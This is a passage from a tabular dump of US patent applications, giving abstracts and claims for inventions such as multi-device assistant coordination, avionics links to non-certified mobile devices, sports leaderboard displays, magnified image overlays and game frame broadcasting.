receive a user instruction to perform an action; identify context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; automatically group a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the user instruction and the context awareness information; and communicate the instruction to the collection of one or more responsive electronic devices to perform the action by the collection of one or more responsive electronic devices. 19. The computer program product of claim 18, wherein the computer executable code further to store a list of one or more candidate electronic devices that are registered for use within a network, the list including unique identifying information for the electronic devices, as well as operating characteristics of the electronic devices relevant to a type of action that the electronic devices perform. 20. The computer program product of claim 18, wherein the computer executable code further to store a DPA device application that includes voice recognition, the DPA device application to interpret natural language input in spoken form to infer intent therefrom, and perform actions based on the inferred intent. | A computer implemented method, device and computer program device are provided that are under control of one or more processors configured with executable instructions. The method receives a user instruction to perform an action, identifies context awareness information concerning an environment where the action is to be performed. The environment includes a plurality of candidate electronic devices. At least one of the candidate electronic devices provides digital personal assistant (DPA) functionality. The method groups a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information. The method communicates the instruction to the collection of one or more responsive electronic devices to coordinate the action by the collection of one or more responsive electronic devices.1. A method, comprising:
under control of one or more processors configured with executable instructions; receiving a user instruction to perform an action; identifying context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; grouping a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information; and communicating the instruction to the collection of one or more responsive electronic devices to coordinate the action by the responsive collection. 2. The method of claim 1, wherein the plurality of electronic devices include a DPA device, and wherein one or more of the identifying, grouping and communicating are performed by the DPA device. 3. The method of claim 2, further comprising determining whether to include the DPA device in the collection of one or more responsive electronic devices that perform the action. 4. The method of claim 1, wherein the context awareness information includes information indicative of a condition present in the environment in which the corresponding electronic devices are located. 5. The method of claim 1, wherein the collection of one or more responsive electronic devices include multiple DPA devices, and wherein the communicating the instruction includes coordinating an operation of the multiple DPA devices to act jointly in a manner perceived by one or more individuals within the environment. 6. The method of claim 5, wherein the environment represents a physical region in which the multiple DPA devices are located and in which the joint action is one or more of heard, seen, or felt by the one or more individuals. 7. The method of claim 1, wherein the identifying includes determining activity in a region surrounding a first electronic device from the plurality of electronic devices. 8. The method of claim 7, wherein the determining activity is based on one or more of calendar data, motion data, sleep habit data or device usage data. 9. The method of claim 1, further comprising identifying the plurality of candidate electronic devices based on availability on a network. 10. A device, comprising:
an input to receive a user instruction to perform an action; a processor; a memory storing program instructions accessible by the processor, wherein, responsive to execution of the program instructions, the processor performs the following:
identifying context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; and
grouping a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the context awareness information; and
a transceiver to communicate the instruction to the collection of one or more responsive electronic devices to perform the action by the responsive collection. 11. The device of claim 10, wherein the device is a DPA device. 12. The device of claim 11, the processor further to modify the instruction to include a device command to open a streaming channel and to play audio content that is streamed to the collection of one or more responsive electronic devices. 13. The device of claim 10, wherein the context awareness information includes information indicative of a condition present in the environment in which the corresponding electronic devices are located. 14. The device of claim 10, wherein the collection of one or more responsive electronic devices include multiple DPA devices, and wherein the transceiver sends the instruction to the multiple DPA devices to coordinate an operation of the multiple DPA devices to act jointly in a manner perceived by one or more individuals within the environment. 15. The device of claim 10, further comprising an activity or control circuit including one or more of a motion sensor, light switch, room thermostat, door locking circuit, or appliance to provide the context awareness information. 16. The device of claim 10, the processor to determine activity in a region surrounding a first electronic device from the plurality of electronic devices, the activity associated with the contact awareness information. 17. The device of claim 16, the processor to determine the activity based on one or more of calendar data, motion data, sleep habit data or device usage data. 18. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to:
receive a user instruction to perform an action; identify context awareness information concerning an environment where the action is to be performed, the environment including a plurality of candidate electronic devices, at least one of the candidate electronic devices to provide digital personal assistant (DPA) functionality; automatically group a collection of one or more responsive electronic devices, from the plurality of candidate electronic devices, based on the user instruction and the context awareness information; and communicate the instruction to the collection of one or more responsive electronic devices to perform the action by the collection of one or more responsive electronic devices. 19. The computer program product of claim 18, wherein the computer executable code further to store a list of one or more candidate electronic devices that are registered for use within a network, the list including unique identifying information for the electronic devices, as well as operating characteristics of the electronic devices relevant to a type of action that the electronic devices perform. 20. The computer program product of claim 18, wherein the computer executable code further to store a DPA device application that includes voice recognition, the DPA device application to interpret natural language input in spoken form to infer intent therefrom, and perform actions based on the inferred intent. | 2,400 |
9,141 | 9,141 | 15,685,201 | 2,435 | Systems and methods are provided for FAA-certified avionics devices to safely interface with non-certified mobile telecommunications devices before, during, and after flight. Data transmitted to the certified devices do not affect functionality of the certified device unless and until a user acknowledges and/or confirms the data on the certified device. Thus, the integrity of the certified device is maintained. | 1. A method of processing information on-board an aircraft having aircraft equipment, the method comprising:
utilizing a first device to record aircraft data pertaining to the aircraft; operably connecting a second device within said aircraft to said first device; and uploading the aircraft data from the first device onto the second device, wherein the second device is a non-certified device. 2. The method as claimed in claim 1, further comprising uploading data from the second device to the aircraft equipment. 3. The method as claimed in claim 1, further comprising operably connecting the first device with a mobile server. 4. The method as claimed in claim 3, further comprising operably connecting the second device with the mobile server via the first device. 5. The method as claimed in claim 1 wherein said step of operably connecting said second device to said first device comprises:
generating an encrypted license key for a mobile server in operable data connection with said first device;
hosting said license key on a license server;
providing authorization credentials of the second device to said license server;
downloading said license key from said license server to said second device;
storing said license key within cache on said second device;
establishing a data connection between said mobile server and said second device;
providing said license key to said mobile server for validation;
requesting access by said second device to one or more data resources available via said mobile server in operable data connection with said first device; and
decrypting and validating said license key by said mobile server before authorizing said second device access to said one or more data resources available via said mobile server in operable data connection with said first device. 6. A method of processing information on-board an aircraft having aircraft equipment, the method comprising:
operably connecting a non-certified device within said aircraft to said aircraft equipment; transmitting non-certified information from said non-certified device; and receiving by said aircraft equipment said non-certified information. 7. The method as claimed in claim 6, wherein said transmitting step is performed through a gateway device. 8. The method as claimed in claim 6, further comprising:
generating a request for a user acknowledgement or confirmation after said aircraft equipment receives said non-certified information; and allowing changes to information or functionality of the aircraft device based on said received non-certified information only after said user acknowledgement or confirmation is provided. 9. The method as claimed in claim 6, further comprising the steps of:
connecting said aircraft equipment to an avionics display installed in said aircraft, wherein said avionics display is non-certified; and displaying said non-certified information transmitted from said non-certified device on said avionics display. 10. A method of displaying information on-board an aircraft comprising the steps of:
providing an avionics device installed in said aircraft; operably connecting a second device within said aircraft to said avionics device, wherein said second device is a non-certified device; transmitting information from said avionics device to said second device; generating an encrypted license key for a mobile server in operable data connection with said avionics device; hosting said license key on a license server; providing authorization credentials of the second device to said license server; downloading said license key from said license server to said second device; storing said license key within cache on said second device; establishing a data connection between said mobile server and said second device; providing said license key to said mobile server for validation; requesting access by said second device to one or more data resources available via said mobile server in operable data connection with said avionics device; and decrypting and validating said license key by said mobile server before authorizing said second device access to said one or more data resources available via said mobile server in operable data connection with said avionics device. 11. The method as claimed in claim 10, wherein said transmitting step is performed through a gateway device. 12. A system for transmitting and receiving aircraft data communications, the system comprising:
a first device associated with the aircraft, said first device being configured to receive data; a second device configured to send a first package of data to said first device, said second device being a non-certified mobile computing device; a display configured to display information associated with said first package of data; and a gateway hardware device configured to provide a secure data communication connection between said first device and said second device, wherein the system is configured to receive user inputs associated with the first package of data as a user validation of the first package of data, thereby creating a first validated package of data, wherein the system is configured to utilize the first validated package of data to change information or functionality of the first device, and wherein the system is configured such that the first package of data is not utilized to change information or functionality of the first device unless the first package of data is validated by a user. 13. A method of processing information on-board an aircraft having an avionics device, the method comprising:
operably connecting a second device within the aircraft to the avionics device, the second device being a non-certified device; generating a first package of data comprising FAA-certified information; receiving by the second device the first package of data, utilizing by the second device the first package of data to generate a second package of data comprising non-certified information; transmitting by the second device the second package of data; and receiving by the avionics device the second package of data. 14. The method as claimed in claim 13, further comprising storing information within a data store. 15. The method as claimed in claim 14, wherein the second device receives at least some of the certified information from the data store. 16. The method as claimed in claim 14, wherein the non-certified information includes instructions for manipulating at least some of the data stored in the data store. 17. The method as claimed in claim 16, wherein at least some of the information stored in the data store includes information pertaining to an application configuration associated with the second device of the second package of data. 18. The method as claimed in claim 16, wherein at least some of the information stored in the data store includes information pertaining to a state of the second device. | Systems and methods are provided for FAA-certified avionics devices to safely interface with non-certified mobile telecommunications devices before, during, and after flight. Data transmitted to the certified devices do not affect functionality of the certified device unless and until a user acknowledges and/or confirms the data on the certified device. Thus, the integrity of the certified device is maintained.1. A method of processing information on-board an aircraft having aircraft equipment, the method comprising:
utilizing a first device to record aircraft data pertaining to the aircraft; operably connecting a second device within said aircraft to said first device; and uploading the aircraft data from the first device onto the second device, wherein the second device is a non-certified device. 2. The method as claimed in claim 1, further comprising uploading data from the second device to the aircraft equipment. 3. The method as claimed in claim 1, further comprising operably connecting the first device with a mobile server. 4. The method as claimed in claim 3, further comprising operably connecting the second device with the mobile server via the first device. 5. The method as claimed in claim 1 wherein said step of operably connecting said second device to said first device comprises:
generating an encrypted license key for a mobile server in operable data connection with said first device;
hosting said license key on a license server;
providing authorization credentials of the second device to said license server;
downloading said license key from said license server to said second device;
storing said license key within cache on said second device;
establishing a data connection between said mobile server and said second device;
providing said license key to said mobile server for validation;
requesting access by said second device to one or more data resources available via said mobile server in operable data connection with said first device; and
decrypting and validating said license key by said mobile server before authorizing said second device access to said one or more data resources available via said mobile server in operable data connection with said first device. 6. A method of processing information on-board an aircraft having aircraft equipment, the method comprising:
operably connecting a non-certified device within said aircraft to said aircraft equipment; transmitting non-certified information from said non-certified device; and receiving by said aircraft equipment said non-certified information. 7. The method as claimed in claim 6, wherein said transmitting step is performed through a gateway device. 8. The method as claimed in claim 6, further comprising:
generating a request for a user acknowledgement or confirmation after said aircraft equipment receives said non-certified information; and allowing changes to information or functionality of the aircraft device based on said received non-certified information only after said user acknowledgement or confirmation is provided. 9. The method as claimed in claim 6, further comprising the steps of:
connecting said aircraft equipment to an avionics display installed in said aircraft, wherein said avionics display is non-certified; and displaying said non-certified information transmitted from said non-certified device on said avionics display. 10. A method of displaying information on-board an aircraft comprising the steps of:
providing an avionics device installed in said aircraft; operably connecting a second device within said aircraft to said avionics device, wherein said second device is a non-certified device; transmitting information from said avionics device to said second device; generating an encrypted license key for a mobile server in operable data connection with said avionics device; hosting said license key on a license server; providing authorization credentials of the second device to said license server; downloading said license key from said license server to said second device; storing said license key within cache on said second device; establishing a data connection between said mobile server and said second device; providing said license key to said mobile server for validation; requesting access by said second device to one or more data resources available via said mobile server in operable data connection with said avionics device; and decrypting and validating said license key by said mobile server before authorizing said second device access to said one or more data resources available via said mobile server in operable data connection with said avionics device. 11. The method as claimed in claim 10, wherein said transmitting step is performed through a gateway device. 12. A system for transmitting and receiving aircraft data communications, the system comprising:
a first device associated with the aircraft, said first device being configured to receive data; a second device configured to send a first package of data to said first device, said second device being a non-certified mobile computing device; a display configured to display information associated with said first package of data; and a gateway hardware device configured to provide a secure data communication connection between said first device and said second device, wherein the system is configured to receive user inputs associated with the first package of data as a user validation of the first package of data, thereby creating a first validated package of data, wherein the system is configured to utilize the first validated package of data to change information or functionality of the first device, and wherein the system is configured such that the first package of data is not utilized to change information or functionality of the first device unless the first package of data is validated by a user. 13. A method of processing information on-board an aircraft having an avionics device, the method comprising:
operably connecting a second device within the aircraft to the avionics device, the second device being a non-certified device; generating a first package of data comprising FAA-certified information; receiving by the second device the first package of data, utilizing by the second device the first package of data to generate a second package of data comprising non-certified information; transmitting by the second device the second package of data; and receiving by the avionics device the second package of data. 14. The method as claimed in claim 13, further comprising storing information within a data store. 15. The method as claimed in claim 14, wherein the second device receives at least some of the certified information from the data store. 16. The method as claimed in claim 14, wherein the non-certified information includes instructions for manipulating at least some of the data stored in the data store. 17. The method as claimed in claim 16, wherein at least some of the information stored in the data store includes information pertaining to an application configuration associated with the second device of the second package of data. 18. The method as claimed in claim 16, wherein at least some of the information stored in the data store includes information pertaining to a state of the second device. | 2,400 |
9,142 | 9,142 | 15,093,068 | 2,421 | A leaderboard parsing and distribution system comprises at least one computing device. The at least one computing device comprises at least one processor. The leaderboard parsing and distribution system comprises a plurality of display devices communicatively coupled to the at least one computing device. The leaderboard parsing and distribution system comprises a non-transitory machine readable medium. The non-transitory machine readable medium comprises instructions configured to cause the at least one processor to access leaderboard data. For at least two display devices in the plurality of display devices, the non-transitory machine readable medium comprises instructions configured to cause the at least one processor to select a subset of the leaderboard data to be displayed on each of the at least two display devices, and cause the subset of the leaderboard data to be displayed on the each of the at least two display devices. | 1. A leaderboard parsing and distribution system comprising:
a. at least one computing device comprising at least one processor; b. a plurality of display devices communicatively coupled to the at least one computing device; and c. a non-transitory machine readable medium comprising instructions configured to cause the at least one processor to:
i. access leaderboard data; and
ii. for at least two display devices in the plurality of display devices:
1. select a subset of the leaderboard data to be displayed on each of the at least two display devices; and
2. cause the subset of the leaderboard data to be displayed on the each of the at least two display devices. 2. The leaderboard parsing and distribution system according to claim 1, wherein the at least one computing device comprises at least one of the following:
a. a personal computer; b. a computer server; c. a mobile device; and d. a tablet. 3. The leaderboard parsing and distribution system according to claim 1, wherein at least two of the plurality of display devices are configured for multiple spectator viewing. 4. The leaderboard parsing and distribution system according to claim 1, wherein at least one display device in the plurality of display devices is configured to be portable. 5. The leaderboard parsing and distribution system according to claim 1, wherein the leaderboard data comprises at least one of the following:
a. HTML data; b. XML data; c. image data; and d. text. 6. The leaderboard parsing and distribution system according to claim 1, wherein the subset of the leaderboard data comprises data identifying at least one of the following:
a. a flight of golfers; b. a plurality of flights of golfers; c. an athlete; d. a plurality of athletes; e. a team; f. a plurality of teams; g. a competitor; h. a plurality of competitors; i. a contestant; and j. a plurality of contestants. 7. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to update the subset of the leaderboard data at regular intervals. 8. The leaderboard parsing and distribution system according to claim 1, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the subset of the leaderboard data and direct the subset to a specific display device in the plurality of display devices. 9. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to accept registrations for at least one of the following;
a. a tournament; b. a sporting event; c. a competition; and d. a contest. 10. The leaderboard parsing and distribution system according to claim 1, wherein at least one of the plurality of display devices is a touch screen configured to enable input by at least one of the following:
a. a golfer; b. a caddy; c. an athlete; d. a competitor; e. a contestant; f. a team representative; g. a manager; h. a coach; and i. a spectator. 11. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to:
a. access at least one advertisement; b. select at least one display device in the plurality of display devices; and c. cause the at least one advertisement to be displayed on the at least one display device. 12. The leaderboard parsing and distribution system according to claim 11, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the at least one display device. 13. A spectator advertising distribution system comprising:
a. at least one computing device comprising at least one processor; b. a plurality of groups of display devices communicatively coupled to the at least one computing device, each group in the plurality of groups of display devices associated with a distinct venue; and c. a non-transitory machine readable medium comprising instructions configured to cause the at least one processor to:
i. select at least one advertisement from a plurality of advertisements;
ii. select at least one group of display devices in the plurality of groups of display devices; and
iii. add the at least one advertisement to an advertising queue associated with the at least one group of display devices. 14. The spectator advertising distribution system according to claim 13, wherein the at least one computing device comprises at least one of the following:
a. a personal computer; b. a computer server; c. a mobile device; and d. a tablet. 15. The spectator advertising distribution system according to claim 13, wherein the plurality of groups of display devices are configured for multiple spectator viewing. 16. The spectator advertising distribution system according to claim 13, wherein the at least one group of display devices in the plurality of groups of display devices comprises at least one display device configured to be portable. 17. The spectator advertising distribution system according to claim 13, wherein the at least one group of display devices in the plurality of groups of display devices comprises at least one touch screen configured to enable input by at least one of the following:
a. a golfer; b. a caddy; c. an athlete; d. a competitor; e. a contestant; f. a team representative; g. a manager; and h. a coach. 18. The spectator advertising distribution system according to claim 13 wherein the distinct venue comprises at least one of the following:
a. a golf course;
b. a stadium;
c. a gymnasium;
d. at least one outdoor spectating area;
e. at least one indoor spectating area;
f. at least one transition area;
g. a club house;
h. at least one shooting area;
i. at least one body of water; and
j. at least one fishing area. 19. The spectator advertising distribution system according to claim 13, wherein the advertising queue is configured to store the at least one advertisement for addition to a set of streaming connections associated with the at least one group of display devices. 20. The spectator advertising distribution system according to claim 13, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the at least one advertisement and the at least one group of display devices. | A leaderboard parsing and distribution system comprises at least one computing device. The at least one computing device comprises at least one processor. The leaderboard parsing and distribution system comprises a plurality of display devices communicatively coupled to the at least one computing device. The leaderboard parsing and distribution system comprises a non-transitory machine readable medium. The non-transitory machine readable medium comprises instructions configured to cause the at least one processor to access leaderboard data. For at least two display devices in the plurality of display devices, the non-transitory machine readable medium comprises instructions configured to cause the at least one processor to select a subset of the leaderboard data to be displayed on each of the at least two display devices, and cause the subset of the leaderboard data to be displayed on the each of the at least two display devices.1. A leaderboard parsing and distribution system comprising:
a. at least one computing device comprising at least one processor; b. a plurality of display devices communicatively coupled to the at least one computing device; and c. a non-transitory machine readable medium comprising instructions configured to cause the at least one processor to:
i. access leaderboard data; and
ii. for at least two display devices in the plurality of display devices:
1. select a subset of the leaderboard data to be displayed on each of the at least two display devices; and
2. cause the subset of the leaderboard data to be displayed on the each of the at least two display devices. 2. The leaderboard parsing and distribution system according to claim 1, wherein the at least one computing device comprises at least one of the following:
a. a personal computer; b. a computer server; c. a mobile device; and d. a tablet. 3. The leaderboard parsing and distribution system according to claim 1, wherein at least two of the plurality of display devices are configured for multiple spectator viewing. 4. The leaderboard parsing and distribution system according to claim 1, wherein at least one display device in the plurality of display devices is configured to be portable. 5. The leaderboard parsing and distribution system according to claim 1, wherein the leaderboard data comprises at least one of the following:
a. HTML data; b. XML data; c. image data; and d. text. 6. The leaderboard parsing and distribution system according to claim 1, wherein the subset of the leaderboard data comprises data identifying at least one of the following:
a. a flight of golfers; b. a plurality of flights of golfers; c. an athlete; d. a plurality of athletes; e. a team; f. a plurality of teams; g. a competitor; h. a plurality of competitors; i. a contestant; and j. a plurality of contestants. 7. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to update the subset of the leaderboard data at regular intervals. 8. The leaderboard parsing and distribution system according to claim 1, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the subset of the leaderboard data and direct the subset to a specific display device in the plurality of display devices. 9. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to accept registrations for at least one of the following;
a. a tournament; b. a sporting event; c. a competition; and d. a contest. 10. The leaderboard parsing and distribution system according to claim 1, wherein at least one of the plurality of display devices is a touch screen configured to enable input by at least one of the following:
a. a golfer; b. a caddy; c. an athlete; d. a competitor; e. a contestant; f. a team representative; g. a manager; h. a coach; and i. a spectator. 11. The leaderboard parsing and distribution system according to claim 1, wherein the machine readable medium further comprises instructions configured to cause the at least one processor to:
a. access at least one advertisement; b. select at least one display device in the plurality of display devices; and c. cause the at least one advertisement to be displayed on the at least one display device. 12. The leaderboard parsing and distribution system according to claim 11, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the at least one display device. 13. A spectator advertising distribution system comprising:
a. at least one computing device comprising at least one processor; b. a plurality of groups of display devices communicatively coupled to the at least one computing device, each group in the plurality of groups of display devices associated with a distinct venue; and c. a non-transitory machine readable medium comprising instructions configured to cause the at least one processor to:
i. select at least one advertisement from a plurality of advertisements;
ii. select at least one group of display devices in the plurality of groups of display devices; and
iii. add the at least one advertisement to an advertising queue associated with the at least one group of display devices. 14. The spectator advertising distribution system according to claim 13, wherein the at least one computing device comprises at least one of the following:
a. a personal computer; b. a computer server; c. a mobile device; and d. a tablet. 15. The spectator advertising distribution system according to claim 13, wherein the plurality of groups of display devices are configured for multiple spectator viewing. 16. The spectator advertising distribution system according to claim 13, wherein the at least one group of display devices in the plurality of groups of display devices comprises at least one display device configured to be portable. 17. The spectator advertising distribution system according to claim 13, wherein the at least one group of display devices in the plurality of groups of display devices comprises at least one touch screen configured to enable input by at least one of the following:
a. a golfer; b. a caddy; c. an athlete; d. a competitor; e. a contestant; f. a team representative; g. a manager; and h. a coach. 18. The spectator advertising distribution system according to claim 13 wherein the distinct venue comprises at least one of the following:
a. a golf course;
b. a stadium;
c. a gymnasium;
d. at least one outdoor spectating area;
e. at least one indoor spectating area;
f. at least one transition area;
g. a club house;
h. at least one shooting area;
i. at least one body of water; and
j. at least one fishing area. 19. The spectator advertising distribution system according to claim 13, wherein the advertising queue is configured to store the at least one advertisement for addition to a set of streaming connections associated with the at least one group of display devices. 20. The spectator advertising distribution system according to claim 13, further comprising a user interface and wherein the machine readable medium further comprises instructions configured to cause the at least one processor to enable a user via the user interface to select the at least one advertisement and the at least one group of display devices. | 2,400 |
9,143 | 9,143 | 15,593,760 | 2,485 | Provided are systems and methods that allow a user to capture images at low- and high-level magnification and then overlay the high-level magnification images on the low-level magnification image to ease review of the images. The high-level magnification images may be overlaid on the low-level magnification image based at least in part on the portion of the low-level magnification image from which the high-level image was originated. | 1. A method of image analysis, comprising:
collecting, at a first level of magnification, at least one first level image of a sample; collecting, at a second level of magnification that is greater than the first level of magnification, a first second level image that comprises a region of the corresponding first level image; and overlaying the first second level image on the first level image. 2. The method of claim 1, wherein the first second level image is overlaid on the first level image such that the first second level image is positioned according to the region of the first level image that is comprised in the first second level image. 3. The method of claim 1, further comprising collecting a second second level image that comprises a region of the corresponding first level image. 4. The method of claim 3, further comprising aligning the first second level image and the second second level image such that the aligned first second level image and the second second level images form a contiguous image of a region of the corresponding first level image. 5. The method of claim 4, wherein the aligning is at least partially effected by overlapping a region of the first second level image with a region of the second second level image. 6. The method of claim 3, further comprising overlaying the first second level image and the second second level images on the first level image. 7. The method of claim 6, wherein the first second level image and the second second level image are overlaid on the first level image such that they are positioned relative to one another according to the regions of the first level image that are comprised in the first second level image and the second second level image. 8. The method of claim 1, wherein the first level image and the second level image are each collected under different illumination conditions. 9.-11. (canceled) 12. The method of claim 1, further comprising enabling a user to, from a view of the first image, select and display the second image. 13. (canceled) 14. A sample analysis system, comprising:
an imaging device configured to (a) collect first level sample images at a first level of magnification and (b) collect second level sample images at a second level of magnification that is greater than the first level of magnification, a second level sample image comprising a region at least partially disposed within a corresponding first image; and a processor configured to effect overlaying the second level image on the first level image. 15. The system of claim 14, wherein the processor is configured to align a feature of at least one collected second level image with the corresponding feature of the first level image that corresponds to that second image. 16. The system of claim 11, wherein the processor is configured to overlay the first second level image on the first level image such that the first second level image is positioned according to the region of the first level image that is comprised in the first second level image. 17. The system of claim 11, wherein the processor is configured to collect a second second level image that comprises a region of the corresponding first level image. 18. The system of claim 17, wherein the processor is configured to align the first second level image and the second second level image such that the aligned first second level image and the second second level images form a contiguous image of a region of the corresponding first level image. 19. (canceled) 20. (canceled) 21. The system of claim 20, wherein the processor is configured overlay the first second level image and the second second level image on the first level image such that they are positioned relative to one another according to the regions of the first level image that are comprised in the first second level image and the second second level image. 22.-38. (canceled) 39. A method of image analysis, comprising:
collecting, at a first level of magnification, a plurality of first level sample images; for each member of a set of at least some of the plurality of first level sample images, collecting at a second level of magnification greater than the first level of magnification one or more second level sample images that comprises a region at least partially disposed within that corresponding first level sample image; for at least some of those members of the set of first level sample images, aligning a feature of each of the one or more second images with the corresponding feature of that corresponding first level sample image; and overlaying the one or more second level sample images on the corresponding first level sample image. 40. The method of claim 39, wherein one or more second level sample images from within two or more first level sample images are taken at the same relative positions within the respective first level sample images. 41. The method of claim 39, wherein collecting the plurality of first level sample images, collecting the second level sample images, or both, is effected in an automated fashion. 42. The method of claim 39, wherein (a) at least one or more first level sample images is based on information taken at two or more focal planes, (b) wherein at least one or more second level sample images is based on information taken at two or more focal planes, or both (a) and (b). 43. The method of claim 39, wherein collecting a first level sample image and collecting a second level sample image is effected by changing objective lenses. 44.-50. (canceled) | Provided are systems and methods that allow a user to capture images at low- and high-level magnification and then overlay the high-level magnification images on the low-level magnification image to ease review of the images. The high-level magnification images may be overlaid on the low-level magnification image based at least in part on the portion of the low-level magnification image from which the high-level image was originated.1. A method of image analysis, comprising:
collecting, at a first level of magnification, at least one first level image of a sample; collecting, at a second level of magnification that is greater than the first level of magnification, a first second level image that comprises a region of the corresponding first level image; and overlaying the first second level image on the first level image. 2. The method of claim 1, wherein the first second level image is overlaid on the first level image such that the first second level image is positioned according to the region of the first level image that is comprised in the first second level image. 3. The method of claim 1, further comprising collecting a second second level image that comprises a region of the corresponding first level image. 4. The method of claim 3, further comprising aligning the first second level image and the second second level image such that the aligned first second level image and the second second level images form a contiguous image of a region of the corresponding first level image. 5. The method of claim 4, wherein the aligning is at least partially effected by overlapping a region of the first second level image with a region of the second second level image. 6. The method of claim 3, further comprising overlaying the first second level image and the second second level images on the first level image. 7. The method of claim 6, wherein the first second level image and the second second level image are overlaid on the first level image such that they are positioned relative to one another according to the regions of the first level image that are comprised in the first second level image and the second second level image. 8. The method of claim 1, wherein the first level image and the second level image are each collected under different illumination conditions. 9.-11. (canceled) 12. The method of claim 1, further comprising enabling a user to, from a view of the first image, select and display the second image. 13. (canceled) 14. A sample analysis system, comprising:
an imaging device configured to (a) collect first level sample images at a first level of magnification and (b) collect second level sample images at a second level of magnification that is greater than the first level of magnification, a second level sample image comprising a region at least partially disposed within a corresponding first image; and a processor configured to effect overlaying the second level image on the first level image. 15. The system of claim 14, wherein the processor is configured to align a feature of at least one collected second level image with the corresponding feature of the first level image that corresponds to that second image. 16. The system of claim 11, wherein the processor is configured to overlay the first second level image on the first level image such that the first second level image is positioned according to the region of the first level image that is comprised in the first second level image. 17. The system of claim 11, wherein the processor is configured to collect a second second level image that comprises a region of the corresponding first level image. 18. The system of claim 17, wherein the processor is configured to align the first second level image and the second second level image such that the aligned first second level image and the second second level images form a contiguous image of a region of the corresponding first level image. 19. (canceled) 20. (canceled) 21. The system of claim 20, wherein the processor is configured overlay the first second level image and the second second level image on the first level image such that they are positioned relative to one another according to the regions of the first level image that are comprised in the first second level image and the second second level image. 22.-38. (canceled) 39. A method of image analysis, comprising:
collecting, at a first level of magnification, a plurality of first level sample images; for each member of a set of at least some of the plurality of first level sample images, collecting at a second level of magnification greater than the first level of magnification one or more second level sample images that comprises a region at least partially disposed within that corresponding first level sample image; for at least some of those members of the set of first level sample images, aligning a feature of each of the one or more second images with the corresponding feature of that corresponding first level sample image; and overlaying the one or more second level sample images on the corresponding first level sample image. 40. The method of claim 39, wherein one or more second level sample images from within two or more first level sample images are taken at the same relative positions within the respective first level sample images. 41. The method of claim 39, wherein collecting the plurality of first level sample images, collecting the second level sample images, or both, is effected in an automated fashion. 42. The method of claim 39, wherein (a) at least one or more first level sample images is based on information taken at two or more focal planes, (b) wherein at least one or more second level sample images is based on information taken at two or more focal planes, or both (a) and (b). 43. The method of claim 39, wherein collecting a first level sample image and collecting a second level sample image is effected by changing objective lenses. 44.-50. (canceled) | 2,400 |
9,144 | 9,144 | 15,902,803 | 2,421 | A system for low latency broadcast of animation frames includes a frame extractor stored in memory and executable to access frame data generated by a rendering pipeline of a frame generation engine. During runtime of the frame generation engine, the frame extractor exports the frame data for use external to the frame generation engine. | 1. A system for low-latency communication of frame data comprising:
a processor; memory; a frame extractor stored in memory and executable by the processor to access frame data generated by a rendering pipeline of a frame generation engine and to export the frame data for use external to the frame generation engine; and a broadcasting agent stored in the memory and executable by the processor to broadcast the frame data exported from the frame generation engine for viewing on a remote spectating device. 2. The system of claim 1, wherein the frame generation engine is a game engine. 3. The system of claim 1, wherein the frame generation engine is communicatively coupled to a graphics processing unit application programming interface (GPU API) via the rendering pipeline and the frame data is generated by the GPU API. 4. The system of claim 2, wherein the GPU API renders the frame data onto input of an encoder external to the frame generation engine without modifying the frame data. 5. The system of claim 4, wherein the broadcasting agent is executable to receive encoded frame data output from the encoder and to broadcast the encoded frame data to a spectating system for viewing on a remote spectating device. 6. The system of claim 1, wherein the frame extractor accesses the frame data by initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 7. The system of claim 6, wherein the frame extractor is further executable to use the pointer to draw data of the object onto input of an encoder. 8. One or more tangible computer-readable storage media of a tangible article of manufacture encoding computer-executable instructions for executing on a computer system a computer process, the computer process comprising:
accessing frame data generated by a rendering pipeline of a frame generation engine; exporting the frame data for use external to the frame generation engine; and broadcasting the exported frame data for viewing on a remote spectating device. 9. The one or more tangible computer-readable storage media of claim 8, wherein the frame generation engine is a game engine. 10. The one or more tangible computer-readable storage media system of claim 8, wherein the frame generation engine is communicatively coupled to a graphics processing unit application programming interface (GPU API) via the rendering pipeline and the frame data is generated by the GPU API. 11. The one or more tangible computer-readable storage media of claim 8, wherein the computer process further comprises:
rendering the frame data onto input of an encoder external to the frame generation engine without altering a format of the frame data. 12. The one or more tangible computer-readable storage media of claim 8, wherein accessing the frame data further comprises:
initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 13. The one or more tangible computer-readable storage media of claim 12, further comprising:
using the received pointer to draw data of the object onto input of the encoder. 14. A device comprising:
